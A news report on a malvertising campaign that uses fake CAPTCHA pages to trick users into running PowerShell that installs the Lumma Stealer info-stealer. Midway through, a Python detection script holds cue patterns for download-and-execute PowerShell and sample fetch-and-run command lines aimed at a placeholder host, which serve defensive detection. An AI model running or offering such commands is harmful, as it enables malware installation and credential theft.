Massive malvertising campaign delivers Lumma Stealer via fake CAPTCHA pages

 


A large-scale malvertising campaign has been discovered distributing the Lumma Stealer info-stealing malware through fake CAPTCHA verification pages.

The campaign, dubbed “DeceptionAds” by Guardio Labs researchers, has been linked to a threat actor known as “Vane Viper.”

The campaign is believed to be a more sophisticated iteration of earlier “ClickFix” attacks, where victims were tricked into executing malicious PowerShell commands.

In the most recent operation, the attackers leveraged the legitimate advertising platform Monetag to distribute the malware at scale. The operation delivered over one million ad impressions per day across approximately 3,000 websites. Unlike previous campaigns that relied on phishing emails or malicious sites, DeceptionAds infiltrates legitimate online advertising to target unsuspecting users.

Typically, the malicious ads appear on pirate streaming platforms and websites hosting cracked software. When users click on these ads, obfuscated code verifies that they are humans (not bots) and then redirects them to a fake CAPTCHA verification page. The redirection occurs through the BeMob cloaking service, a tool generally used for legitimate ad performance tracking but here exploited for evasion purposes.

On the fake CAPTCHA page, victims are presented with instructions to “paste a CAPTCHA solution” into their Windows Run dialog, while a hidden JavaScript snippet copies a malicious one-line PowerShell command to the victim’s clipboard. When the user executes that PowerShell command, it downloads and runs the Lumma Stealer malware from a remote server.
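The Run-dialog launch chain described above leaves a recognisable trace in process-creation telemetry: a PowerShell process whose parent is explorer.exe and whose command line carries download-and-execute cues, a hidden-window flag, or an encoded command. The following detection sketch is an added example, not code from Guardio Labs or from the campaign; it assumes Sysmon-style process-creation events serialised as JSON lines with `Image`, `ParentImage`, `CommandLine` and `ProcessId` fields, and its sample events and the `example.invalid` host are constructed.

```python
import base64
import json
import re

# -EncodedCommand carries base64 of UTF-16LE; the other cues are typical of the one-liner the fake CAPTCHA page plants on the clipboard.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
CUES = [
    (re.compile(r"invoke-webrequest|\biwr\b|downloadstring|invoke-expression|\biex\b|net\.webclient", re.I), "download-and-execute cue"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile|-e(?:xecutionpolicy|p)\s+bypass", re.I), "hidden window or policy bypass"),
    (ENCODED_FLAG, "encoded command"),
]

def expand_encoded(cmdline):
    """Append the decoded -EncodedCommand payload so cues hidden inside it become visible."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline

def score_event(event):
    """Return the reasons one process-creation event looks like a Run-dialog (ClickFix) launch."""
    if not event.get("Image", "").lower().endswith(("powershell.exe", "pwsh.exe")):
        return []
    cmd = expand_encoded(event.get("CommandLine", ""))
    # Pasting into Win+R makes explorer.exe the parent; admin tooling rarely starts PowerShell that way.
    reasons = ["parent is explorer.exe (Run dialog)"] if event.get("ParentImage", "").lower().endswith("explorer.exe") else []
    reasons += [why for rx, why in CUES if rx.search(cmd)]
    return reasons

def find_clickfix_candidates(lines, threshold=2):
    """Parse JSON Sysmon-style events (one per line); return those with at least `threshold` reasons."""
    hits = []
    for line in lines:
        event = json.loads(line)
        reasons = score_event(event)
        if len(reasons) >= threshold:
            hits.append({"pid": event["ProcessId"], "reasons": reasons})
    return hits

# Constructed sample events; example.invalid is a placeholder, not a real indicator.
ENC_SAMPLE = base64.b64encode("iwr https://example.invalid/p | iex".encode("utf-16le")).decode()
PS, EXPLORER = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe"
SAMPLE_LINES = [json.dumps(e) for e in [
    {"ProcessId": 101, "Image": PS, "ParentImage": EXPLORER, "CommandLine": 'powershell -w hidden -c "iex (iwr https://example.invalid/c)"'},
    {"ProcessId": 102, "Image": PS, "ParentImage": EXPLORER, "CommandLine": "powershell -enc " + ENC_SAMPLE},
    {"ProcessId": 103, "Image": r"C:\Program Files\PowerShell\7\pwsh.exe", "ParentImage": EXPLORER, "CommandLine": "pwsh -NoLogo"},
]]
```

Calling `find_clickfix_candidates(SAMPLE_LINES)` flags events 101 and 102 and leaves the plain `pwsh -NoLogo` launch alone; the encoded variant is caught only because the base64 argument is decoded before the cues are matched.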

Lumma Stealer is a highly advanced information-stealing malware that can siphon login credentials and passwords; browser cookies, history, and saved credit card data; cryptocurrency wallets and private keys; and sensitive text files stored locally.

The stolen data is archived and sent back to the attacker’s server, where it can be used in follow-on attacks or sold on cybercrime marketplaces for profit.

Guardio Labs reported the large-scale abuse to Monetag and BeMob. Monetag removed 200 accounts linked to the threat actor within eight days, while BeMob shut down the malicious activity within four days. However, researchers observed signs of resurgence on December 11, as the attackers attempted to re-establish operations through a different ad network.
